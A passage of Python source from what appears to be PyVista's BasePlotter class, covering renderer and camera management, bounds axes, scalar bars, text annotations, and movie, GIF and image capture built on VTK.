self.mapper.scalar_range = clim
return
# Use the name to find the desired actor
def update_mapper(mapper_helper):
mapper_helper.scalar_range = clim
return
try:
for mh in self._scalar_bar_mappers[name]:
update_mapper(mh)
except KeyError:
raise KeyError('Name ({}) not valid/not found in this plotter.')
return
@property
def camera_set(self):
""" Returns if the camera of the active renderer has been set """
return self.renderer.camera_set
def get_default_cam_pos(self):
""" Return the default camera position of the active renderer """
return self.renderer.get_default_cam_pos()
@camera_set.setter
def camera_set(self, is_set):
""" Sets if the camera has been set on the active renderer"""
self.renderer.camera_set = is_set
@property
def renderer(self):
""" simply returns the active renderer """
return self.renderers[self._active_renderer_index]
@property
def bounds(self):
""" Returns the bounds of the active renderer """
return self.renderer.bounds
@property
def length(self):
"""Returns the length of the diagonal of the bounding box of the scene
"""
return pyvista.Box(self.bounds).length
@property
def center(self):
""" Returns the center of the active renderer """
return self.renderer.center
def update_bounds_axes(self):
""" Update the bounds of the active renderer """
return self.renderer.update_bounds_axes()
@property
def _scalar_bar_slots(self):
return self.renderer._scalar_bar_slots
@property
def _scalar_bar_slot_lookup(self):
return self.renderer._scalar_bar_slot_lookup
@_scalar_bar_slots.setter
def _scalar_bar_slots(self, value):
self.renderer._scalar_bar_slots = value
@_scalar_bar_slot_lookup.setter
def _scalar_bar_slot_lookup(self, value):
self.renderer._scalar_bar_slot_lookup = value
def clear(self):
""" Clears plot by removing all actors and properties """
for renderer in self.renderers:
renderer.RemoveAllViewProps()
self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))
self._scalar_bar_slot_lookup = {}
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
def remove_actor(self, actor, reset_camera=False):
"""
Removes an actor from the Plotter.
Parameters
----------
actor : vtk.vtkActor
Actor that has previously added to the Renderer.
reset_camera : bool, optional
Resets camera so all actors can be seen.
Returns
-------
success : bool
True when actor removed. False when actor has not been
removed.
"""
for renderer in self.renderers:
renderer.remove_actor(actor, reset_camera)
return True
def add_actor(self, uinput, reset_camera=False, name=None, loc=None,
culling=False, pickable=True):
"""
Adds an actor to render window. Creates an actor if input is
a mapper.
Parameters
----------
uinput : vtk.vtkMapper or vtk.vtkActor
vtk mapper or vtk actor to be added.
reset_camera : bool, optional
Resets the camera when true.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
culling : bool optional
Does not render faces that should not be visible to the
plotter. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Default False.
Returns
-------
actor : vtk.vtkActor
The actor.
actor_properties : vtk.Properties
Actor properties.
"""
# add actor to the correct render window
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
return renderer.add_actor(uinput=uinput, reset_camera=reset_camera,
name=name, culling=culling, pickable=pickable)
def loc_to_index(self, loc):
"""
Return index of the render window given a location index.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``.
Returns
-------
idx : int
Index of the render window.
"""
if loc is None:
return self._active_renderer_index
elif isinstance(loc, int):
return loc
elif isinstance(loc, collections.Iterable):
if not len(loc) == 2:
raise AssertionError('"loc" must contain two items')
index_row = loc[0]
index_column = loc[1]
if index_row < 0 or index_row >= self.shape[0]:
raise IndexError('Row index is out of range ({})'.format(self.shape[0]))
if index_column < 0 or index_column >= self.shape[1]:
raise IndexError('Column index is out of range ({})'.format(self.shape[1]))
sz = int(self.shape[0] * self.shape[1])
idxs = np.array([i for i in range(sz)], dtype=int).reshape(self.shape)
return idxs[index_row, index_column]
def index_to_loc(self, index):
"""Convert a 1D index location to the 2D location on the plotting grid
"""
sz = int(self.shape[0] * self.shape[1])
idxs = np.array([i for i in range(sz)], dtype=int).reshape(self.shape)
args = np.argwhere(idxs == index)
if len(args) < 1:
raise RuntimeError('Index ({}) is out of range.')
return args[0]
@property
def camera(self):
""" The active camera of the active renderer """
return self.renderer.camera
@camera.setter
def camera(self, camera):
"""Set the active camera for the rendering scene"""
self.renderer.camera = camera
def enable_parallel_projection(self):
"""Set use parallel projection. The camera will have a parallel
projection. Parallel projection is often useful when viewing images or
2D datasets.
"""
return self.renderer.enable_parallel_projection()
def disable_parallel_projection(self):
"""Reset the camera to use perspective projection."""
return self.renderer.disable_parallel_projection()
def add_axes_at_origin(self, x_color=None, y_color=None, z_color=None,
xlabel='X', ylabel='Y', zlabel='Z', line_width=2,
labels_off=False, loc=None):
"""
Add axes actor at the origin of a render window.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. When None, defaults to the
active render window.
Returns
--------
marker_actor : vtk.vtkAxesActor
vtkAxesActor actor
"""
kwargs = locals()
_ = kwargs.pop('self')
_ = kwargs.pop('loc')
self._active_renderer_index = self.loc_to_index(loc)
return self.renderers[self._active_renderer_index].add_axes_at_origin(**kwargs)
def show_bounds(self, mesh=None, bounds=None, show_xaxis=True,
show_yaxis=True, show_zaxis=True, show_xlabels=True,
show_ylabels=True, show_zlabels=True, italic=False,
bold=True, shadow=False, font_size=None,
font_family=None, color=None,
xlabel='X Axis', ylabel='Y Axis', zlabel='Z Axis',
use_2d=False, grid=None, location='closest', ticks=None,
all_edges=False, corner_factor=0.5, fmt=None,
minor_ticks=False, loc=None, padding=0.0):
"""
Adds bounds axes. Shows the bounds of the most recent input
mesh unless mesh is specified.
Parameters
----------
mesh : vtkPolydata or unstructured grid, optional
Input mesh to draw bounds axes around
bounds : list or tuple, optional
Bounds to override mesh bounds.
[xmin, xmax, ymin, ymax, zmin, zmax]
show_xaxis : bool, optional
Makes x axis visible. Default True.
show_yaxis : bool, optional
Makes y axis visible. Default True.
show_zaxis : bool, optional
Makes z axis visible. Default True.
show_xlabels : bool, optional
Shows x labels. Default True.
show_ylabels : bool, optional
Shows y labels. Default True.
show_zlabels : bool, optional
Shows z labels. Default True.
italic : bool, optional
Italicises axis labels and numbers. Default False.
bold : bool, optional
Bolds axis labels and numbers. Default True.
shadow : bool, optional
Adds a black shadow to the text. Default False.
font_size : float, optional
Sets the size of the label font. Defaults to 16.
font_family : string, optional
Font family. Must be either courier, times, or arial.
color : string or 3 item list, optional
Color of all labels and axis titles. Default white.
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
xlabel : string, optional
Title of the x axis. Default "X Axis"
ylabel : string, optional
Title of the y axis. Default "Y Axis"
zlabel : string, optional
Title of the z axis. Default "Z Axis"
use_2d : bool, optional
A bug with vtk 6.3 in Windows seems to cause this function
to crash this can be enabled for smoother plotting for
other enviornments.
grid : bool or str, optional
Add grid lines to the backface (``True``, ``'back'``, or
``'backface'``) or to the frontface (``'front'``,
``'frontface'``) of the axes actor.
location : str, optional
Set how the axes are drawn: either static (``'all'``),
closest triad (``front``), furthest triad (``'back'``),
static closest to the origin (``'origin'``), or outer
edges (``'outer'``) in relation to the camera
position. Options include: ``'all', 'front', 'back',
'origin', 'outer'``
ticks : str, optional
Set how the ticks are drawn on the axes grid. Options include:
``'inside', 'outside', 'both'``
all_edges : bool, optional
Adds an unlabeled and unticked box at the boundaries of
plot. Useful for when wanting to plot outer grids while
still retaining all edges of the boundary.
corner_factor : float, optional
If ``all_edges````, this is the factor along each axis to
draw the default box. Dafuault is 0.5 to show the full box.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
padding : float, optional
An optional percent padding along each axial direction to cushion
the datasets in the scene from the axes annotations. Defaults to
have no padding
Returns
-------
cube_axes_actor : vtk.vtkCubeAxesActor
Bounds actor
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = pyvista.Sphere()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh)
>>> _ = plotter.show_bounds(grid='front', location='outer', all_edges=True)
>>> plotter.show() # doctest:+SKIP
"""
kwargs = locals()
_ = kwargs.pop('self')
_ = kwargs.pop('loc')
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
renderer.show_bounds(**kwargs)
def add_bounds_axes(self, *args, **kwargs):
"""Deprecated"""
logging.warning('`add_bounds_axes` is deprecated. Use `show_bounds` or `show_grid`.')
return self.show_bounds(*args, **kwargs)
def add_bounding_box(self, color=None, corner_factor=0.5, line_width=None,
opacity=1.0, render_lines_as_tubes=False, lighting=None,
reset_camera=None, loc=None):
"""
Adds an unlabeled and unticked box at the boundaries of
plot. Useful for when wanting to plot outer grids while
still retaining all edges of the boundary.
Parameters
----------
corner_factor : float, optional
If ``all_edges``, this is the factor along each axis to
draw the default box. Dafuault is 0.5 to show the full
box.
corner_factor : float, optional
This is the factor along each axis to draw the default
box. Dafuault is 0.5 to show the full box.
line_width : float, optional
Thickness of lines.
opacity : float, optional
Opacity of mesh. Should be between 0 and 1. Default 1.0
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
kwargs = locals()
_ = kwargs.pop('self')
_ = kwargs.pop('loc')
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
return renderer.add_bounding_box(**kwargs)
def remove_bounding_box(self, loc=None):
"""
Removes bounding box from the active renderer.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
renderer.remove_bounding_box()
def remove_bounds_axes(self, loc=None):
"""
Removes bounds axes from the active renderer.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
renderer.remove_bounds_axes()
def subplot(self, index_row, index_column):
"""
Sets the active subplot.
Parameters
----------
index_row : int
Index of the subplot to activate along the rows.
index_column : int
Index of the subplot to activate along the columns.
"""
if index_row < 0 or index_row >= self.shape[0]:
raise IndexError('Row index is out of range ({})'.format(self.shape[0]))
if index_column < 0 or index_column >= self.shape[1]:
raise IndexError('Column index is out of range ({})'.format(self.shape[1]))
self._active_renderer_index = self.loc_to_index((index_row, index_column))
def link_views(self, views=0):
"""
Links the views' cameras.
Parameters
----------
views : int | tuple or list
If ``views`` is int, link the views to the given view
index or if ``views`` is a tuple or a list, link the given
views cameras.
"""
if isinstance(views, int):
for renderer in self.renderers:
renderer.camera = self.renderers[views].camera
elif isinstance(views, collections.Iterable):
for view_index in views:
self.renderers[view_index].camera = \
self.renderers[views[0]].camera
else:
raise TypeError('Expected type is int, list or tuple:'
'{} is given'.format(type(views)))
def unlink_views(self, views=None):
"""
Unlinks the views' cameras.
Parameters
----------
views : None | int | tuple or list
If ``views`` is None unlink all the views, if ``views``
is int unlink the selected view's camera or if ``views``
is a tuple or a list, unlink the given views cameras.
"""
if views is None:
for renderer in self.renderers:
renderer.camera = vtk.vtkCamera()
renderer.reset_camera()
elif isinstance(views, int):
self.renderers[views].camera = vtk.vtkCamera()
self.renderers[views].reset_camera()
elif isinstance(views, collections.Iterable):
for view_index in views:
self.renderers[view_index].camera = vtk.vtkCamera()
self.renderers[view_index].reset_camera()
else:
raise TypeError('Expected type is None, int, list or tuple:'
'{} is given'.format(type(views)))
def show_grid(self, **kwargs):
"""
A wrapped implementation of ``show_bounds`` to change default
behaviour to use gridlines and showing the axes labels on the outer
edges. This is intended to be silimar to ``matplotlib``'s ``grid``
function.
"""
kwargs.setdefault('grid', 'back')
kwargs.setdefault('location', 'outer')
kwargs.setdefault('ticks', 'both')
return self.show_bounds(**kwargs)
def set_scale(self, xscale=None, yscale=None, zscale=None, reset_camera=True):
"""
Scale all the datasets in the scene of the active renderer.
Scaling in performed independently on the X, Y and Z axis.
A scale of zero is illegal and will be replaced with one.
Parameters
----------
xscale : float, optional
Scaling of the x axis. Must be greater than zero.
yscale : float, optional
Scaling of the y axis. Must be greater than zero.
zscale : float, optional
Scaling of the z axis. Must be greater than zero.
reset_camera : bool, optional
Resets camera so all actors can be seen.
"""
self.renderer.set_scale(xscale, yscale, zscale, reset_camera)
@property
def scale(self):
""" The scaling of the active renderer. """
return self.renderer.scale
def add_scalar_bar(self, title=None, n_labels=5, italic=False,
bold=True, title_font_size=None,
label_font_size=None, color=None,
font_family=None, shadow=False, mapper=None,
width=None, height=None, position_x=None,
position_y=None, vertical=None,
interactive=False, fmt=None, use_opacity=True,
outline=False, nan_annotation=False,
below_label=None, above_label=None,
background_color=None, n_colors=None):
"""
Creates scalar bar using the ranges as set by the last input
mesh.
Parameters
----------
title : string, optional
Title of the scalar bar. Default None
n_labels : int, optional
Number of labels to use for the scalar bar.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
title_font_size : float, optional
Sets the size of the title font. Defaults to None and is sized
automatically.
label_font_size : float, optional
Sets the size of the title font. Defaults to None and is sized
automatically.
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
width : float, optional
The percentage (0 to 1) width of the window for the colorbar
height : float, optional
The percentage (0 to 1) height of the window for the colorbar
position_x : float, optional
The percentage (0 to 1) along the windows's horizontal
direction to place the bottom left corner of the colorbar
position_y : float, optional
The percentage (0 to 1) along the windows's vertical
direction to place the bottom left corner of the colorbar
interactive : bool, optional
Use a widget to control the size and location of the scalar bar.
use_opacity : bool, optional
Optionally disply the opacity mapping on the scalar bar
outline : bool, optional
Optionally outline the scalar bar to make opacity mappings more
obvious.
nan_annotation : bool, optional
Annotate the NaN color
below_label : str, optional
String annotation for values below the scalar range
above_label : str, optional
String annotation for values above the scalar range
background_color: array, optional
The color used for the background in RGB format.
n_colors: int, optional
The maximum number of color displayed in the scalar bar.
Notes
-----
Setting title_font_size, or label_font_size disables automatic font
sizing for both the title and label.
"""
if font_family is None:
font_family = rcParams['font']['family']
if label_font_size is None:
label_font_size = rcParams['font']['label_size']
if title_font_size is None:
title_font_size = rcParams['font']['title_size']
if color is None:
color = rcParams['font']['color']
if fmt is None:
fmt = rcParams['font']['fmt']
if vertical is None:
if rcParams['colorbar_orientation'].lower() == 'vertical':
vertical = True
# Automatically choose size if not specified
if width is None:
if vertical:
width = rcParams['colorbar_vertical']['width']
else:
width = rcParams['colorbar_horizontal']['width']
if height is None:
if vertical:
height = rcParams['colorbar_vertical']['height']
else:
height = rcParams['colorbar_horizontal']['height']
# check if maper exists
if mapper is None:
if not hasattr(self, 'mapper') or self.mapper is None:
raise Exception('Mapper does not exist. ' +
'Add a mesh with scalars first.')
mapper = self.mapper
if title:
# Check that this data hasn't already been plotted
if title in list(self._scalar_bar_ranges.keys()):
clim = list(self._scalar_bar_ranges[title])
newrng = mapper.scalar_range
oldmappers = self._scalar_bar_mappers[title]
# get max for range and reset everything
if newrng[0] < clim[0]:
clim[0] = newrng[0]
if newrng[1] > clim[1]:
clim[1] = newrng[1]
for mh in oldmappers:
mh.scalar_range = clim[0], clim[1]
mapper.scalar_range = clim[0], clim[1]
self._scalar_bar_mappers[title].append(mapper)
self._scalar_bar_ranges[title] = clim
# Color bar already present and ready to be used so returning
return
# Automatically choose location if not specified
if position_x is None or position_y is None:
try:
slot = min(self._scalar_bar_slots)
self._scalar_bar_slots.remove(slot)
self._scalar_bar_slot_lookup[title] = slot
except:
raise RuntimeError('Maximum number of color bars reached.')
if position_x is None:
if vertical:
position_x = rcParams['colorbar_vertical']['position_x']
position_x -= slot * (width + 0.2 * width)
else:
position_x = rcParams['colorbar_horizontal']['position_x']
if position_y is None:
if vertical:
position_y = rcParams['colorbar_vertical']['position_y']
else:
position_y = rcParams['colorbar_horizontal']['position_y']
position_y += slot * height
# Adjust to make sure on the screen
if position_x + width > 1:
position_x -= width
if position_y + height > 1:
position_y -= height
# parse color
color = parse_color(color)
# Create scalar bar
self.scalar_bar = vtk.vtkScalarBarActor()
if background_color is not None:
from ..core.common import vtk_to_numpy, numpy_to_vtk
if not isinstance(background_color, collections.Iterable):
raise TypeError('Expected type for `background_color`'
'is list, tuple or np.ndarray: '
'{} is given'.format(type(background_color)))
if len(background_color) != 3:
raise ValueError('Expected length for `background_color` is 3: '
'{} is given'.format(len(background_color)))
background_color = np.asarray(background_color)
background_color = np.append(background_color, 1.0) * 255.
lut = vtk.vtkLookupTable()
lut.DeepCopy(mapper.lookup_table)
ctable = vtk_to_numpy(lut.GetTable())
alphas = ctable[:, -1][:, np.newaxis] / 255.
use_table = ctable.copy()
use_table[:, -1] = 255.
ctable = (use_table * alphas) + background_color * (1 - alphas)
lut.SetTable(numpy_to_vtk(ctable, array_type=vtk.VTK_UNSIGNED_CHAR))
else:
lut = mapper.lookup_table
self.scalar_bar.SetLookupTable(lut)
if n_colors is not None:
self.scalar_bar.SetMaximumNumberOfColors(n_colors)
if n_labels < 1:
self.scalar_bar.DrawTickLabelsOff()
else:
self.scalar_bar.SetNumberOfLabels(n_labels)
if nan_annotation:
self.scalar_bar.DrawNanAnnotationOn()
if above_label:
self.scalar_bar.DrawAboveRangeSwatchOn()
self.scalar_bar.SetAboveRangeAnnotation(above_label)
if below_label:
self.scalar_bar.DrawBelowRangeSwatchOn()
self.scalar_bar.SetBelowRangeAnnotation(below_label)
# edit the size of the colorbar
self.scalar_bar.SetHeight(height)
self.scalar_bar.SetWidth(width)
self.scalar_bar.SetPosition(position_x, position_y)
if fmt is not None:
self.scalar_bar.SetLabelFormat(fmt)
if vertical:
self.scalar_bar.SetOrientationToVertical()
else:
self.scalar_bar.SetOrientationToHorizontal()
if label_font_size is None or title_font_size is None:
self.scalar_bar.UnconstrainedFontSizeOn()
self.scalar_bar.AnnotationTextScalingOn()
label_text = self.scalar_bar.GetLabelTextProperty()
anno_text = self.scalar_bar.GetAnnotationTextProperty()
label_text.SetColor(color)
anno_text.SetColor(color)
label_text.SetShadow(shadow)
anno_text.SetShadow(shadow)
# Set font
label_text.SetFontFamily(parse_font_family(font_family))
anno_text.SetFontFamily(parse_font_family(font_family))
label_text.SetItalic(italic)
anno_text.SetItalic(italic)
label_text.SetBold(bold)
anno_text.SetBold(bold)
if label_font_size:
label_text.SetFontSize(label_font_size)
anno_text.SetFontSize(label_font_size)
# Set properties
if title:
clim = mapper.scalar_range
self._scalar_bar_ranges[title] = clim
self._scalar_bar_mappers[title] = [mapper]
self.scalar_bar.SetTitle(title)
title_text = self.scalar_bar.GetTitleTextProperty()
title_text.SetJustificationToCentered()
title_text.SetItalic(italic)
title_text.SetBold(bold)
title_text.SetShadow(shadow)
if title_font_size:
title_text.SetFontSize(title_font_size)
# Set font
title_text.SetFontFamily(parse_font_family(font_family))
# set color
title_text.SetColor(color)
self._scalar_bar_actors[title] = self.scalar_bar
if interactive is None:
interactive = rcParams['interactive']
if shape != (1, 1):
interactive = False
elif interactive and self.shape != (1, 1):
err_str = 'Interactive scalar bars disabled for multi-renderer plots'
raise Exception(err_str)
if interactive and hasattr(self, 'iren'):
self.scalar_widget = vtk.vtkScalarBarWidget()
self.scalar_widget.SetScalarBarActor(self.scalar_bar)
self.scalar_widget.SetInteractor(self.iren)
self.scalar_widget.SetEnabled(1)
rep = self.scalar_widget.GetRepresentation()
# self.scalar_widget.On()
if vertical is True or vertical is None:
rep.SetOrientation(1) # 0 = Horizontal, 1 = Vertical
else:
rep.SetOrientation(0) # 0 = Horizontal, 1 = Vertical
self._scalar_bar_widgets[title] = self.scalar_widget
if use_opacity:
self.scalar_bar.SetUseOpacity(True)
if outline:
self.scalar_bar.SetDrawFrame(True)
frame_prop = self.scalar_bar.GetFrameProperty()
frame_prop.SetColor(color)
else:
self.scalar_bar.SetDrawFrame(False)
self.add_actor(self.scalar_bar, reset_camera=False, pickable=False)
def update_scalars(self, scalars, mesh=None, render=True):
"""
Updates scalars of the an object in the plotter.
Parameters
----------
scalars : np.ndarray
Scalars to replace existing scalars.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
"""
if mesh is None:
mesh = self.mesh
if isinstance(mesh, (collections.Iterable, pyvista.MultiBlock)):
# Recursive if need to update scalars on many meshes
for m in mesh:
self.update_scalars(scalars, mesh=m, render=False)
if render:
self.ren_win.Render()
return
if isinstance(scalars, str):
# Grab scalar array if name given
scalars = get_array(mesh, scalars)
if scalars is None:
if render:
self.ren_win.Render()
return
if scalars.shape[0] == mesh.GetNumberOfPoints():
data = mesh.GetPointData()
elif scalars.shape[0] == mesh.GetNumberOfCells():
data = mesh.GetCellData()
else:
raise_not_matching(scalars, mesh)
vtk_scalars = data.GetScalars()
if vtk_scalars is None:
raise Exception('No active scalars')
s = convert_array(vtk_scalars)
s[:] = scalars
data.Modified()
try:
# Why are the points updated here? Not all datasets have points
# and only the scalar array is modified by this function...
mesh.GetPoints().Modified()
except:
pass
if render:
self.ren_win.Render()
def update_coordinates(self, points, mesh=None, render=True):
"""
Updates the points of the an object in the plotter.
Parameters
----------
points : np.ndarray
Points to replace existing points.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
"""
if mesh is None:
mesh = self.mesh
mesh.points = points
if render:
self._render()
def close(self):
""" closes render window """
# must close out widgets first
super(BasePlotter, self).close()
if hasattr(self, 'axes_widget'):
del self.axes_widget
if hasattr(self, 'scalar_widget'):
del self.scalar_widget
# reset scalar bar stuff
self.clear()
if hasattr(self, 'ren_win'):
self.ren_win.Finalize()
del self.ren_win
if hasattr(self, '_style'):
del self._style
if hasattr(self, 'iren'):
self.iren.RemoveAllObservers()
self.iren.TerminateApp()
del self.iren
if hasattr(self, 'textActor'):
del self.textActor
# end movie
if hasattr(self, 'mwriter'):
try:
self.mwriter.close()
except BaseException:
pass
def deep_clean(self):
for renderer in self.renderers:
renderer.deep_clean()
# Do not remove the renderers on the clean
self.mesh = None
self.mapper = None
def add_text(self, text, position='upper_left', font_size=18, color=None,
font=None, shadow=False, name=None, loc=None):
"""
Adds text to plot object in the top left corner by default
Parameters
----------
text : str
The text to add the the rendering
position : str, tuple(float)
String name of the position or length 2 tuple of the pixelwise
position to place the bottom left corner of the text box.
If string name is used, returns a `vtkCornerAnnotation` object
normally used for fixed labels (like title or xlabel).
If tuple is used, returns a more general `vtkOpenGLTextActor`.
Default is to find the top left corner of the renderering window
and place text box up there. Available position: ``'lower_left'``,
``'lower_right'``, ``'upper_left'``, ``'upper_right'``,
``'lower_edge'``, ``'upper_edge'``, ``'right_edge'``, and
``'left_edge'``
font : string, optional
Font name may be courier, times, or arial
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``.
Returns
-------
textActor : vtk.vtkTextActor
Text actor added to plot
"""
if font is None:
font = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if color is None:
color = rcParams['font']['color']
if position is None:
# Set the position of the text to the top left corner
window_size = self.window_size
x = (window_size[0] * 0.02) / self.shape[0]
y = (window_size[1] * 0.85) / self.shape[0]
position = [x, y]
corner_mappings = {
'lower_left' : vtk.vtkCornerAnnotation.LowerLeft,
'lower_right' : vtk.vtkCornerAnnotation.LowerRight,
'upper_left' : vtk.vtkCornerAnnotation.UpperLeft,
'upper_right' : vtk.vtkCornerAnnotation.UpperRight,
'lower_edge' : vtk.vtkCornerAnnotation.LowerEdge,
'upper_edge' : vtk.vtkCornerAnnotation.UpperEdge,
'left_edge' : vtk.vtkCornerAnnotation.LeftEdge,
'right_edge' : vtk.vtkCornerAnnotation.RightEdge,
}
corner_mappings['ll'] = corner_mappings['lower_left']
corner_mappings['lr'] = corner_mappings['lower_right']
corner_mappings['ul'] = corner_mappings['upper_left']
corner_mappings['ur'] = corner_mappings['upper_right']
corner_mappings['top'] = corner_mappings['upper_edge']
corner_mappings['bottom'] = corner_mappings['lower_edge']
corner_mappings['right'] = corner_mappings['right_edge']
corner_mappings['r'] = corner_mappings['right_edge']
corner_mappings['left'] = corner_mappings['left_edge']
corner_mappings['l'] = corner_mappings['left_edge']
if isinstance(position, (int, str, bool)):
if isinstance(position, str):
position = corner_mappings[position]
elif position == True:
position = corner_mappings['upper_left']
self.textActor = vtk.vtkCornerAnnotation()
# This is how you set the font size with this actor
self.textActor.SetLinearFontScaleFactor(font_size // 2)
self.textActor.SetText(position, text)
else:
self.textActor = vtk.vtkTextActor()
self.textActor.SetInput(text)
self.textActor.SetPosition(position)
self.textActor.GetTextProperty().SetFontSize(int(font_size * 2))
self.textActor.GetTextProperty().SetColor(parse_color(color))
self.textActor.GetTextProperty().SetFontFamily(FONT_KEYS[font])
self.textActor.GetTextProperty().SetShadow(shadow)
self.add_actor(self.textActor, reset_camera=False, name=name, loc=loc, pickable=False)
return self.textActor
def open_movie(self, filename, framerate=24):
"""
Establishes a connection to the ffmpeg writer
Parameters
----------
filename : str
Filename of the movie to open. Filename should end in mp4,
but other filetypes may be supported. See "imagio.get_writer"
framerate : int, optional
Frames per second.
"""
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self.mwriter = imageio.get_writer(filename, fps=framerate)
def open_gif(self, filename):
"""
Open a gif file.
Parameters
----------
filename : str
Filename of the gif to open. Filename must end in gif.
"""
if filename[-3:] != 'gif':
raise Exception('Unsupported filetype. Must end in .gif')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self._gif_filename = os.path.abspath(filename)
self.mwriter = imageio.get_writer(filename, mode='I')
def write_frame(self):
""" Writes a single frame to the movie file """
if not hasattr(self, 'mwriter'):
raise AssertionError('This plotter has not opened a movie or GIF file.')
self.mwriter.append_data(self.image)
@property
def window_size(self):
""" returns render window size """
return list(self.ren_win.GetSize())
@window_size.setter
def window_size(self, window_size):
""" set the render window size """
self.ren_win.SetSize(window_size[0], window_size[1])
def _run_image_filter(self, ifilter):
# Update filter and grab pixels
ifilter.Modified()
ifilter.Update()
image = pyvista.wrap(ifilter.GetOutput())
img_size = image.dimensions
img_array = pyvista.utilities.point_scalar(image, 'ImageScalars')
# Reshape and write
tgt_size = (img_size[1], img_size[0], -1)
return img_array.reshape(tgt_size)[::-1]
@property
def image_depth(self):
""" Returns an image array of current render window """
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
ifilter.SetInputBufferTypeToZBuffer()
return self._run_image_filter(ifilter)
@property
def image(self):
""" Returns an image array of current render window """
if not hasattr(self, 'ren_win') and hasattr(self, 'last_image'):
return self.last_image
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
if self.image_transparent_background:
ifilter.SetInputBufferTypeToRGBA()
else:
ifilter.SetInputBufferTypeToRGB()
return self._run_image_filter(ifilter)
def enable_eye_dome_lighting(self):
"""Enable eye dome lighting (EDL) for active renderer"""
return self.renderer.enable_eye_dome_lighting()
def disable_eye_dome_lighting(self):
"""Disable eye dome lighting (EDL) for active renderer"""
return self.renderer.disable_eye_dome_lighting()
def add_lines(self, lines, color=(1, 1, 1), width=5, label=None, name=None):
"""
Adds lines to the plotting object.
Parameters
----------
lines : np.ndarray or pyvista.PolyData
Points representing line segments. For example, two line segments
would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
width : float, optional
Thickness of lines
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Returns
-------
actor : vtk.vtkActor
Lines actor.
"""
if not isinstance(lines, np.ndarray):
raise Exception('Input should be an array of point segments')
lines = pyvista.lines_from_points(lines)
# Create mapper and add lines
mapper = vtk.vtkDataSetMapper()
mapper.SetInputData(lines)
rgb_color = parse_color(color)
# legend label
if label:
if not isinstance(label, str):
raise AssertionError('Label must be a string')
self._labels.append([lines, label, rgb_color])
# Create actor
self.scalar_bar = vtk.vtkActor()
self.scalar_bar.SetMapper(mapper)
self.scalar_bar.GetProperty().SetLineWidth(width)
self.scalar_bar.GetProperty().EdgeVisibilityOn()
self.scalar_bar.GetProperty().SetEdgeColor(rgb_color)
self.scalar_bar.GetProperty().SetColor(rgb_color)
self.scalar_bar.GetProperty().LightingOff()
# Add to renderer
self.add_actor(self.scalar_bar, reset_camera=False, name=name, pickable=False)
return self.scalar_bar
def remove_scalar_bar(self):
""" Removes scalar bar """
if hasattr(self, 'scalar_bar'):
self.remove_actor(self.scalar_bar, reset_camera=False)
def add_point_labels(self, points, labels, italic=False, bold=True,
font_size=None, text_color=None,
font_family=None, shadow=False,
show_points=True, point_color=None, point_size=5,
name=None, shape_color='grey', shape='rounded_rect',
fill_shape=True, margin=3, shape_opacity=1.0,
pickable=True, **kwargs):
"""
Creates a point actor with one label from list labels assigned to
each point.
Parameters
----------
points : np.ndarray or pyvista.Common
n x 3 numpy array of points or pyvista dataset with points
